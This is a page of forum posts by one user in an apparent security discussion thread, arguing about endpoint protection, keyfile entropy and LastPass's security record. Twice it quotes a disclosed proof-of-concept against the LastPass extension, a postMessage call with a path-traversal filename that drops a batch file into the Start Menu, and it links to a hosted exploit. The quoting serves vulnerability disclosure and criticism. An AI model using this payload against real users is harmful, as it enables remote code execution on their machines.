Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.
 
  • Post
  • Reply
Wiggly Wayne DDS
Sep 11, 2010



CLAM DOWN posted:

Yup, I'm fully aware of all that.

CLAM DOWN posted:

e: actually gently caress that, a software solution absolutely can be "powerful", you're being wrong by immediately dismissing any software option as "lax and vulnerable", I'm curious what products you've actually tried and used in production
i'm dismissing them categorically unless evidence is presented that they aren't opening more holes than they are closing.

quote:

Have you used either Check Point port protection, or Bit9 Parity/CarbonBlack USB device features?
nope

Subjunctive posted:

Can't you just cut the keyboard cable and get access to the USB traces electrically?
yeah, i mean if you're going that far a tap would be far cleaner and subtle given the environment

Adbot
ADBOT LOVES YOU

Wiggly Wayne DDS
Sep 11, 2010



CLAM DOWN posted:

I highly recommend not dismissing things that you have never used or tried and don't know anything about. Keeping an open mind is very beneficial.
okay the rest is fine about that software being deployed in an enterprise environment but this is just adorable. what did you not like about my security analysis on software endpoint protection suites that made you just shutdown?

Wiggly Wayne DDS
Sep 11, 2010



i'm just amused that you're against not trusting security software, and will only listen to people who've deployed specific variants of the same snakeoil

Wiggly Wayne DDS
Sep 11, 2010



CLAM DOWN posted:

I never said either of those things. I simply asked a question. You're putting words in my mouth and making assumptions, and doing so in an unnecessarily hostile and unproductive way. You haven't been open to any kind of real discussion since the start, so have a good one.
i provided cases of endpoint protection software causing more problems than they solve, to which you responded by asking me:

CLAM DOWN posted:

Yup, I'm fully aware of all that. Have you used either Check Point port protection, or Bit9 Parity/CarbonBlack USB device features?
Which sounds extremely similar to:

Wiggly Wayne DDS posted:

will only listen to people who've deployed specific variants of the same snakeoil
then again maybe you never said any of those things

Wiggly Wayne DDS posted:

i'm just amused that you're against not trusting security software

CLAM DOWN posted:

e: actually gently caress that, a software solution absolutely can be "powerful", you're being wrong by immediately dismissing any software option as "lax and vulnerable", I'm curious what products you've actually tried and used in production

CLAM DOWN posted:

I highly recommend not dismissing things that you have never used or tried and don't know anything about. Keeping an open mind is very beneficial.
at this point you're ignoring my point of software endpoint suites not being better an alternative to hardware lockdowns, and just trying to feel like you've won an argument.

i'm extremely open to discussion, but if you're going to dismiss me while not putting forward anything then there was never going to be a discussion to begin with

Wiggly Wayne DDS
Sep 11, 2010



BangersInMyKnickers posted:

application throwing cert errors.
good thing we don't need to worry about that then

Wiggly Wayne DDS
Sep 11, 2010



how did that make security worse exactly

Wiggly Wayne DDS
Sep 11, 2010



oh so it wasn't a second factor then

Wiggly Wayne DDS
Sep 11, 2010



doctorfrog posted:

Curious, what's the thread's personal policy or advisement for physical password storage, as inscribed a notebook or something? As in, having a hard copy backup of at least your password database password and suitable instructions for use so your next-of-kin can unlock your cat pics when you're quite dead? Is it "don't do it, under any circumstances, you idiot," "safety deposit box only," "folded up in a sock drawer," in the easily lock-picked fire safe, etc.
depends entirely on what you're protecting. doesn't really impact the security of the average user, so just make sure it's relatively up to date. could even leave it next to the computer, better off elsewhere in the event of a fire though

Wiggly Wayne DDS
Sep 11, 2010



Internet Explorer posted:

I'm not aware of any history of vShield exploits. I did a quick look and I see one from 2012 that seems rather benign.
shellshock.

Wiggly Wayne DDS
Sep 11, 2010



hostile attacker someone or good red team someone

Wiggly Wayne DDS
Sep 11, 2010



when you get compromised how are you informing your potential userbase

Wiggly Wayne DDS
Sep 11, 2010



we've had multiple arguments about lastpass in this thread when their security failures come to light so let's get this over with

ratbert90 posted:

He also tore 1pass a new one earlier, but people seem to ignore that. :allears:
who's ignoring that? how developers deal with issues put forward to them and improve going forward should be your highest priority in deciding on a vendor. do you remember lastpass' servers were compromised?

note that compromise was june 2015 and their security guarantees on what an attacker can do with that information are absurdly inaccurate when compared to this november 2015 assessment. i've summarised that assessment before but for those who don't want to read the entire thing:

Wiggly Wayne DDS posted:

If your password manager, by default, has an unencrypted key stored (dOTP) that can be used to authenticate, obtain the encrypted vault key, decrypt the vault key, bypass IP restrictions, bypass 2FA and relies on local storage being impenetrable then you've got a bit of a design flaw. We've seen the damage in the past when Lastpass had an XSS problem that let an attacker grab any plaintext passwords from a vault silently. You're not storing your vault on a single system by virtue of using Lastpass so that is not the only possible angle of attack, and based on prior issues I can't comfortably advise people to use it for secure password storage. Especially given their response to the issues presented.

Wiggly Wayne DDS
Sep 11, 2010



lastpass vuln is up: https://bugs.chromium.org/p/project-zero/issues/detail?id=1209#c5

quote:

win = window.open("https://1min-ui-prod.service.lastpass.com/");
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:./../../../../../Start Menu/Programs/exploit.bat"}, "*");

quote:

LastPass responded and said they have NXDOMAIN'd 1min-ui-prod.service.lastpass.com while they investigate.

They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac.

quote:

I've uploaded the exploit here:

https://lock.cmpxchg8b.com/SaiGhij5/lastpass.html

Wiggly Wayne DDS
Sep 11, 2010



PBS posted:

1password makes it hilariously difficult to import from lastpass.

https://support.1password.com/import-lastpass/
i have no idea why the windows instructions are that complex - 1password has import csv options that allows you to tell it which field means what

Wiggly Wayne DDS
Sep 11, 2010



baka kaba posted:

Is there a recommended source of files to use for keyfiles? Like in case you misplace your only copy of butt.jpg and you have trouble getting a byte-for-byte identical copy again. Is there a good generator system, or reliable source of files that (probably) won't ever change?
... why the gently caress are you using files as your source for keyfiles? what the gently caress is wrong with you

Wiggly Wayne DDS
Sep 11, 2010



baka kaba posted:

I've never used a keyfile for anything, but aren't they literally files? And the point is to have a bunch of unpredictable data in it?
you generate a keyfile using a csprng, not via grabbing random files to feed it and keeping copies of those files to regenerate the keyfile later. the security is that a byte-for-byte copy should be nigh impossible to generate, and you're to keep backup copies of the generated keyfile in the event of disaster

Wiggly Wayne DDS
Sep 11, 2010



Subjunctive posted:

I'm not sure that I would classify a Word doc as having lots of random data, hmm.
yeah it's worth knowing that common file formats are not sources of high entropy, and key file as an idea has severe compromises to security for what strange usability allowances it provides.

Wiggly Wayne DDS
Sep 11, 2010



that they've gone to the media to coerce payment and didn't make an example of, say, a thousand random devices being wiped says it all

Wiggly Wayne DDS
Sep 11, 2010



Double Punctuation posted:

MS spent zero money on that patch because they already made it for POSready.
yeah it was signed in early feb

Wiggly Wayne DDS
Sep 11, 2010



baka kaba posted:

Why's it bad that someone uploaded that? Isn't the idea to have a signature in place so all the AV can detect the killswitch-less version if someone removes that and pushes it out again?

Thats probably a stupid question but I don't know anything about the cyber wars
sandboxes for analysis can still spread before analysis finishes

registering the domain blind was a terrible idea, and all the worse that researchers are now encouraged to do it before ramifications are known for potential publicity

Wiggly Wayne DDS
Sep 11, 2010



whole lot of unexpected posts itt

Wiggly Wayne DDS
Sep 11, 2010



i hear of good security conferences in germany and belgium

Wiggly Wayne DDS
Sep 11, 2010



Double Punctuation posted:

If you've actually committed a crime, maybe you shouldn't go to a convention that's about stopping the crime you committed.
there would be very very few people at security conferences if that were the case

Wiggly Wayne DDS
Sep 11, 2010



the clause was never about the breach in the first case, that's about their services

Wiggly Wayne DDS
Sep 11, 2010



yeah i'm sure the malware made sure to hook into the uninstaller as well, nevermind the other secondary payloads that haven't been found

Wiggly Wayne DDS
Sep 11, 2010



BangersInMyKnickers posted:

The writeup from Avast claims that they neutered the C&C servers before any kind of payload could occur, though how they are actually confirming that claim is a bit of a mystery. It was arbitrary code installed as System so the worst case persistent rootkit is a possibility though considering the visibility they PROBABLY cleaned things up for the majority of users.
their claim is that of the infected clients that avast covered (~30% of so) they didn't detect a secondary payload. therefore the rest are fine and there's no evidence of a problem

not quite sure how they'd be able to make such a bold claim given the window of infection and degree of invasive analysis required to detect that weeks later, but that's their side of the matter

Wiggly Wayne DDS fucked around with this message at 15:56 on Sep 19, 2017

Wiggly Wayne DDS
Sep 11, 2010



mllaneza posted:

I'm no expert, but the paper is out:
https://lirias.kuleuven.be/bitstream/123456789/547640/1/usenix2016-wifi.pdf

And it does look serious, very possibly "replace all your APs" serious.
that paper is from 2016, people have only been citing it in regards to prior known design issues. i wouldn't be shocked at places picking it up and saying it's the real thing though

Wiggly Wayne DDS
Sep 11, 2010



NevergirlsOFFICIAL posted:

I was just :smugbert:ing at the owner of my company talking about how ios is so much more secure than android
does :smugbert: include knowing that ios and osx are different?

Wiggly Wayne DDS
Sep 11, 2010



a) ids is garbage and insufficient for new attacks of this calibre
b) poc was made against facebook - twice. the second poc was after the engineers attempted a fix and a different variation of the attack was made
c) bleichenbacher variants aren't something that have been forgotten to the mists of time, it's the basis of DROWN

Wiggly Wayne DDS
Sep 11, 2010



NevergirlsOFFICIAL posted:

what cert should I get? I have ceh and I don't like it because "certified ethical hacker" sounds really stupid.
it's useful to put that on resumes to make sorting them easier

Wiggly Wayne DDS
Sep 11, 2010



EVIL Gibson posted:

It used to be an awesome cert.
...when?

Wiggly Wayne DDS
Sep 11, 2010



deimos posted:

This affects non VMs as well, theoretically a Javascript payload could install a rootkit. That's how hosed this is.
that's not theoretical and the same threat model from rowhammer applies. here's a recent presentation on a js-based attack to defeat aslr: https://www.youtube.com/watch?v=ewe3-mUku94

rowhammer was publicised in 2014, you should have been in a panic since then if this affects you

Wiggly Wayne DDS
Sep 11, 2010



i've yelled and yelled about lastpass before. here's a post from 2015 after they have multiple breaches, which they said wasn't really a problem as they couldn't read your passwords due to the master password, also 2fa and other restrictions made the rest of the attackers data useless. what their pr forgot to mention was a vulnerability had been notified to them in that time period that showed a design decision allowing a bypass to requiring the master password:

Wiggly Wayne DDS posted:

If your password manager, by default, has an unencrypted key stored (dOTP) that can be used to authenticate, obtain the encrypted vault key, decrypt the vault key, bypass IP restrictions, bypass 2FA and relies on local storage being impenetrable then you've got a bit of a design flaw. We've seen the damage in the past when Lastpass had an XSS problem that let an attacker grab any plaintext passwords from a vault silently. You're not storing your vault on a single system by virtue of using Lastpass so that is not the only possible angle of attack, and based on prior issues I can't comfortably advise people to use it for secure password storage. Especially given their response to the issues presented.
it was just 2017 when taviso had a glance at it and found a rce:

Wiggly Wayne DDS posted:

lastpass vuln is up: https://bugs.chromium.org/p/project-zero/issues/detail?id=1209#c5

quote:

win = window.open("https://1min-ui-prod.service.lastpass.com/");
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:./../../../../../Start Menu/Programs/exploit.bat"}, "*");

quote:

LastPass responded and said they have NXDOMAIN'd 1min-ui-prod.service.lastpass.com while they investigate.

They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac.

quote:

I've uploaded the exploit here:

https://lock.cmpxchg8b.com/SaiGhij5/lastpass.html
these are all well after they had burned any ounce of security credibility but people kept on giving them another chance, so there's little point in me yelling about it more - either you care about security or you use lastpass

Wiggly Wayne DDS
Sep 11, 2010



i'm always impressed with what software people manage to find for a more or less solved problem

seriously can you guys make a list somewhere? these weird recommendations people make on forums for 'security software anyone should have' that no one in security's heard of it legitimately impressive. it's a massive blindspot in auditing as, as a general rule, security researchers tend to only audit apps they've heard of or use causing this wide divide

Wiggly Wayne DDS
Sep 11, 2010



ElCondemn posted:

I don’t understand the issue people have with LastPass, sure they were hacked but my understanding is that they encrypt using your “master key”. So all you’d have to do to remain secure is not share your private key. Certainly it would be good to keep your vault secret too but it’s as safe as your keepass database would be if say your Dropbox was hacked...
here's an audit publicised nov 15:
in there is a 2fa bypass and multiple ways of obtaining the vault key. in the june 2015 breach (note that i have to specify the date...)
https://blog.lastpass.com/2015/06/lastpass-security-notice.html/

quote:

Was my master password exposed?
No, LastPass never has access to your master password.

quote:

Were passwords or other data stored in my vault exposed?
No, your data is safe. Encrypted user vaults were not compromised, so no data stored in your vault is at risk
i want you to try and tie together that statement and knowledge after the fact of how abusable their system was. sure the master password itself wasn't, but you could get the vault and key for it, which is technically different.

in response to that rough audit they had the following to say:

Wiggly Wayne DDS posted:

Especially given their response to the issues presented.
that's 2015, it's not improved since.

Wiggly Wayne DDS
Sep 11, 2010



Stanley Pain posted:

Wasn't the latest problem with LastPass something really stupid like having an API call that just let you dump all the login credentials and it was trivial to exploit or am I thinking of something else?
yeah, and if you used the binary version there's trivial code execution: https://bugs.chromium.org/p/project-zero/issues/detail?id=1209

Wiggly Wayne DDS
Sep 11, 2010



yeah there's a high burnout rate in security of people who actually care and want to get things fixed running against people who just want a paycheck and will patch around the issue to make sure that paycheck keeps coming

Wiggly Wayne DDS
Sep 11, 2010



Lain Iwakura posted:

There's also the crowd that does it to look really freaking cool not realising that they're tools and aren't doing anything interesting.
enough with the personal attacks

Wiggly Wayne DDS
Sep 11, 2010



ElCondemn posted:

I used to only use keepass, when I got off Dropbox and started self-hosting my file sync that became a non-starter. Also the fact that my family isn't as tech savvy has made browser integrated password managers the only option for me. Believe me if every website supported OIDC I'd use that in a heartbeat but the options are limited. I haven't seen anything that makes me want to immediately drop Lastpass since there hasn't been a remote or server-side exploit that doesn't require a compromised client. But sure I'm just a shill who works for Amazon (what?) that wants everyone to be insecure... for reasons...
ah so you just weren't reading anything, gotcha

also my post wasn't directed at you at all, there's more than one conversation happening.

Adbot
ADBOT LOVES YOU

Wiggly Wayne DDS
Sep 11, 2010



what part of that required a compromised client...?

  • 1
  • 2
  • 3
  • 4
  • 5
  • Post
  • Reply